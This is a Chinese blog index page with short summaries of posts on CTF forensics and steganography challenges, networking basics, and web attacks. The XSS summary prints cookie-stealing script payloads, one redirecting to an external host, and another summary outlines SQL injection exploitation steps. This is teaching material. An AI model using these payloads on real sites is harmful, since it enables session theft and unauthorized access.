摘要: 题目给了一个where_is_password.pcapng binwalk看到里面有个压缩包,利用foremost分离出来 压缩包需要密码 分析流量包,发现存在sql注入 提取出来进行url解码,可以看到利用二分法进行sql盲注 ascii有 128个所以从>64开始判断,返回用户名或密码错误,然 阅读全文
posted @ 2023-09-10 15:06 开心消消乐a 阅读(59) 评论(0) 推荐(0) 编辑
摘要: 1.简单隐写 ①Binwalk分析图片,发现有rar文件,用dd分离出来 ②提取的压缩包需要密码,尝试使用JPHS无密码得到一个txt文件 ![image](https://img2023.cnblogs.com/blog/1203983/202212/1203983-202212121459407 阅读全文
posted @ 2022-12-17 16:03 开心消消乐a 阅读(111) 评论(1) 推荐(0) 编辑
摘要: (1)背时 描述:腐烂了,变异了,太背时了...... 附件为一个压缩包 解题思路: 1.打开压缩包,发现有一个描述:v(51wA:I7uABi#Bx(T 2.将v(51wA:I7uABi#Bx(T进行Z85解密为c3npr_@aq_y0ir。 3.加密的lsb隐写,利用cloacked-pixel 阅读全文
posted @ 2022-12-08 18:38 开心消消乐a 阅读(503) 评论(0) 推荐(0) 编辑
摘要: 直接换源下载 #1. 设置超时时间,安装txt 文件内安装包 pip install -i https://pypi.tuna.tsinghua.edu.cn/simple --default-timeout=1000 -r packages.txt #2. 指定源安装,推荐清华源 pip inst 阅读全文
posted @ 2022-12-08 00:18 开心消消乐a 阅读(75) 评论(0) 推荐(0) 编辑
摘要: 1、 杂项 图片里面有什么 ,附件为一张图片 通过Binwalk查看发现有压缩包,通过foremost分离一下。 打开输出文件,发现里面有两个图片。 00000000.png是原图,00000722.png里面可能隐藏了信息。通过stegsolve打开图片查看。 发现Lsb隐写,将其另存为png文件 阅读全文
posted @ 2022-09-05 22:27 开心消消乐a 阅读(53) 评论(0) 推荐(0) 编辑
摘要: 路由 静态路由--通过静态路由学习和本路由器非直连的网段。 1.检测路由器和他的直连网段是否能ping通。 如图所示,AR1直连1.0和2.0网段,可以ping通直连他的客户机。 AR2直连2.0和3.0网段,可以ping通他的客户机。 2.如果PC1想要访问3.0网段,AR1与3.0网段没有直连, 阅读全文
posted @ 2022-05-20 17:36 开心消消乐a 阅读(84) 评论(0) 推荐(0) 编辑
摘要: 交换机基础 转发方式 泛洪:交换机把从某一个接口进来的帧转发给本交换机内同一VLAN内的其他所有接口; 转发:交换机把从某一个接口进来的帧转发给指定的某一个端口; 丢弃:交换机把从某一个接口接收到的帧直接丢弃。 MAC 地址表的概念: 当把电脑主机插到交换机接口之后,如果电脑主机开始发送数据,那么交 阅读全文
posted @ 2022-05-20 17:33 开心消消乐a 阅读(257) 评论(0) 推荐(0) 编辑
摘要: XSS攻击 点击查看代码 <script>alert('xss')</script> <script>alert(document.cookie)</script> #显示出cookie信息 <script>document.location='http://www.test.com/cookie. 阅读全文
posted @ 2022-01-16 16:46 开心消消乐a 阅读(123) 评论(0) 推荐(0) 编辑
摘要: import time import socket import threading def device_info(): ip_list = [] name_list = [] user_list = [] passwd_list = [] f = open('devices_list.txt', 阅读全文
posted @ 2021-08-04 12:58 开心消消乐a 阅读(463) 评论(1) 推荐(0) 编辑
摘要: SQL注入漏洞原理与利用 SQL注入漏洞流程 判断注入类型 判断字段个数 查询回显位 查询数据库名 查询表、字段名 查询内容 判断注入类型 1.数字型注入点判断 当要输入的参数x为数字型时,后端脚本中的SQL语句类型大致如下: select * from <表名> where id=x; 数字类型可 阅读全文
posted @ 2021-06-04 09:58 开心消消乐a 阅读(407) 评论(0) 推荐(0) 编辑